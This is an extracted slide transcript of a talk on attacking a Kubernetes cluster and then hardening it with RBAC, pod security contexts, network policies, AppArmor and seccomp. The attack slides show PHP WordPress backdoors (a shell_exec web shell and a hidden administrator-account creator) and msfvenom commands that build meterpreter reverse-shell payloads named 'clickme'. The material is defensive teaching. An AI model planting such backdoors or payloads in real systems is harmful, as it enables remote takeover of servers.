Attacking a K8s cluster and how defending it

Transcript

1. Bust a Kube: Let’s attack a Kubernetes cluster and secure

   it along the way
2. None
3. None
4. None
5. None
6. None
7. None

8. WHAT ATTACKING DEFENDING

9. None

10. WHAT ATTACKING OMG HELP

11. None
12. None
13. None

14. PODS NODES SERVICES NAMESPACES

15. POD Pods are the smallest unit of work in kubernetes

    All containers in a pod share IP 10.10.10.1 10.10.10.2 10.10.10.3 10.10.10.4 ip address pod container volume

16. Node Kubelet Container Runtime: Docker Kube-proxy Kubelet C ontainer Runtim

    e pod #1 pod #2 pod #3

17. Services A service is a load balancer, create a DNS

    name and ip address that routes traffic to matching labels 10.100.10.1 10.10.10.2 10.10.10.2 service ip address public traffic

18. Services A service is a load balancer, create a DNS

    name and ip address that routes traffic to matching labels 10.100.10.1 10.10.10.2 10.10.10.2 service ip address public traffic app=hello tier=web app=hello tier=web

19. Namespaces Logical grouping of resources and the first hint of

    multi-tenancy 10.10.10.2 10.10.10.2 10.10.10.2 10.10.10.2 Marketing Finance
20. None

21. > kubectl apply -f app.yaml

22. None

23. KUBERNETES API SERVER KUBELET CONTAINER RUNTIME ETCD KUBERNETES DASHBOARD

24. POD Pods are the smallest unit of work in kubernetes

    All containers in a pod share IP 10.10.10.1 10.10.10.2 10.10.10.3 10.10.10.4 ip address pod container volume Attacks Tend to Start from a POD
25. None
26. None

27. <?php add_action('wp_head', 'WordPress_bscript'); function WordPress_bscript() { file_put_contents( "exec.php", ‘<?php echo

    shell_exec($_REQUEST[“c”]);’ ); } ?>
28. None
29. None

30. <?php add_action('wp_head', 'WordPress_backdoor'); function WordPress_backdoor() { If ($_GET['backdoor'] == 'go')

    { require('wp-includes/registration.php'); If (!username_exists('backdooradmin')) { $user_id = wp_create_user('admin', ‘admin'); $user = new WP_User($user_id); $user->set_role('administrator'); } } } ?>

31. “Head over to your site and try the function. It’s

    fun, completely safe and can help you in the future if you ever need to have a backdoor entry to your website.”
32. None
33. None
34. None
35. None
36. None
37. None
38. None

39. Kali Linux

40. msfvenom \ -p linux/x64/meterpreter/reverse_tcp \ LHOST=<your ip> \ LPORT=<some port>

    \ -f sh \ -o clickme.sh

41. msfvenom \ -p linux/x64/meterpreter/reverse_tcp \ LHOST=<your ip> \ LPORT=<some port>

    \ -f elf \ -o clickme

42. msfvenom \ -p linux/x64/meterpreter/reverse_tcp \ LHOST=<your ip> \ LPORT=<some port>

    \ -f exe \ -o clickme.exe

43. msfvenom \ -p linux/x64/meterpreter/reverse_tcp \ LHOST=<your ip> \ LPORT=<some port>

    \ -f macho \ -o clickme.macho
44. None
45. None
46. None
47. None

48. KUBERNETES API SERVER KUBELET CONTAINER RUNTIME ETCD KUBERNETES DASHBOARD

49. CONTROL PLANE NETWORKING HOST RUNTIME

50. CONTROL PLANE NETWORKING HOST RUNTIME

51. KUBERNETES API SERVER KUBELET CONTAINER RUNTIME ETCD KUBERNETES DASHBOARD

52. None
53. None
54. None
55. None
56. None
57. None

58. UPGRADE!

59. None

60. Role Based Access Control

61. “RBAC”

62. None

63. Role: MarketingAdmin Role: Developer

64. apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRole metadata: namespace: marketing name: secret-reader rules:

    - apiGroups: [""] resources: ["secrets"] verbs: ["get", "watch", "list"] Role: MarketingAdmin Role: Developer

65. apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRole metadata: namespace: marketing name: secret-reader rules:

    - apiGroups: [""] resources: ["secrets"] verbs: ["get", "watch", "list"] Role: MarketingAdmin Role: Developer RoleBinding

66. CONTROL PLANE NETWORKING HOST RUNTIME

67. apiVersion: v1 kind: Pod metadata: name: security-context-demo spec: SecurityContext: runAsUser:

    1000 Step 1: Run as Non Root

68. apiVersion: v1 kind: Pod metadata: name: security-context-demo spec: SecurityContext: runAsUser:

    1000 readOnlyRootFileSystem: true Step 2: Read Only Filesystem

69. apiVersion: v1 kind: Pod metadata: name: security-context-demo spec: SecurityContext: runAsUser:

    1000 readOnlyRootFileSystem: true allowPrivilegeEscalation: false Step 3: Prevent Escaping

70. CONTROL PLANE NETWORKING HOST RUNTIME

71. apiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: allow-db-access spec: podSelector: matchLabels:

    tier: database ingress: - from: - podSelector: matchLabels: frontend policyTypes: - Ingress Network Policy
72. None
73. None
74. None

75. CONTROL PLANE NETWORKING HOST RUNTIME

76. None
77. None

78. Minimal Host OS

79. None

80. AppArmor

81. seccomp

82. Questions?

83. • CIS Benchmark - CIS Security • Kube-bench - Aqua

    Security • Kube Auto Analyzer - Rory McCune • KubeAudit - Shopify • Sonobuoy - VMWare / Heptio • KubeATF - Symantec

84. Security is a not a noun you refer to every

    now and then, it’s a verb and involves constant and specific action

85. Thanks! [email protected] @signedness